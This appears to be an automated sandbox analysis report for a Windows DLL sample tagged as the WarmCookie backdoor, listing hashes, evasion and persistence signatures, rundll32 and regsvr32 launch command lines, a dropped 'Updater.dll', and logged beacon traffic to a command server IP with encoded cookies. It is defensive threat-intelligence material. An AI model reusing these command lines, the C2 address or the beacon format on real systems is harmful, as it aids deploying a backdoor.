
Windows Analysis Report
akdn2nefd.bin.dll

Overview

General Information

Sample name: akdn2nefd.bin.dll
renamed because original name is a hash value
Original sample name: akdn2nefd.bin.exe
Analysis ID: 1493196
MD5: 59b7b8d29252a9128536fbd08d24375f
SHA1: 7221b9125608a54f9dd706166f936c16ee23164a
SHA256: b7aec5f73d2a6bbd8cd920edb4760e2edadc98c3a45bf4fa994d47ca9cbd02f6
Tags: backdoor, exe, warmcookie

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Creates files in the system32 config directory
Drops HTML or HTM files to system directories
Found evasive API chain (may stop execution after checking mutex)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • loaddll64.exe (PID: 7316 cmdline: loaddll64.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7368 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 7392 cmdline: rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • regsvr32.exe (PID: 7376 cmdline: regsvr32.exe /s C:\Users\user\Desktop\akdn2nefd.bin.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • rundll32.exe (PID: 7400 cmdline: rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllGetClassObject MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7456 cmdline: rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServer MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7504 cmdline: rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServerEx MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 7568 cmdline: C:\Windows\system32\rundll32.exe "C:\ProgramData\Ventuso LLC\Updater.dll",Start /u MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: C:\ProgramData\Ventuso LLC\Updater.dll | ReversingLabs: Detection: 13%
Source: C:\ProgramData\Ventuso LLC\Updater.dll | Virustotal: Detection: 12%
Source: akdn2nefd.bin.dll | ReversingLabs: Detection: 13%
Source: akdn2nefd.bin.dll | Virustotal: Detection: 12%
Source: akdn2nefd.bin.dll | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: E:\work\ooooooops\181\knock_v1.1.8\knock\bin64\knock.pdb | source: rundll32.exe, 00000004.00000003.1777532301.0000016C8D400000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1778367651.0000016C8D405000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp, akdn2nefd.bin.dll, Updater.dll.4.dr
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE115015B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,swprintf,FindFirstFileW,FindNextFileW,FindClose,8_2_00007FFE115015B0
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE11511610 FindFirstFileExA,8_2_00007FFE11511610

Networking

Source: C:\Windows\System32\rundll32.exe | Network Connect: 72.5.43.29 80
Source: Joe Sandbox View | ASN Name: UNASSIGNED UNASSIGNED
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK | User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705) | Host: 72.5.43.29 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK | User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705) | Host: 72.5.43.29 | Content-Length: 120 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: e4 31 93 8b 9c d0 f6 03 3e bb ef 52 64 c1 a6 e0 7b 26 73 32 9b 6e b3 1b ca a1 a7 e7 8f f5 36 22 5c fb 00 56 f2 3e 8d e0 c3 17 d9 5f dd d0 cb b4 1d a7 cc 3f b9 11 97 de 94 d1 ff 36 27 f0 9c 8f 9c 10 ec 74 6a a4 13 e9 c8 ec c6 61 56 e6 b7 2d b2 fe f8 7b 4b cc 17 0e bf 72 29 50 98 a5 bd 77 17 f3 25 e2 91 1f a5 c7 67 c5 ed fe 1f f0 bb 15 eb 2a be 50 73 b1 6c 66 | Data Ascii: 1>Rd{&s2n6"\V>_?6'tjaV-{Kr)Pw%g*Pslf
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK | User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705) | Host: 72.5.43.29 | Content-Length: 776 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK | User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705) | Host: 72.5.43.29 | Connection: Keep-Alive | Cache-Control: no-cache (identical GET request logged 29 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 72.5.43.29 (logged 50 times)
Source: C:\Windows\System32\rundll32.exe | Code function: 8_2_00007FFE11501F20 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,wcscpy,wcscat,SetLastError,HttpSendRequestW,GetLastError,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,8_2_00007FFE11501F20
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK | User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705) | Host: 72.5.43.29 | Connection: Keep-Alive | Cache-Control: no-cache (identical GET request logged 3 times)
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2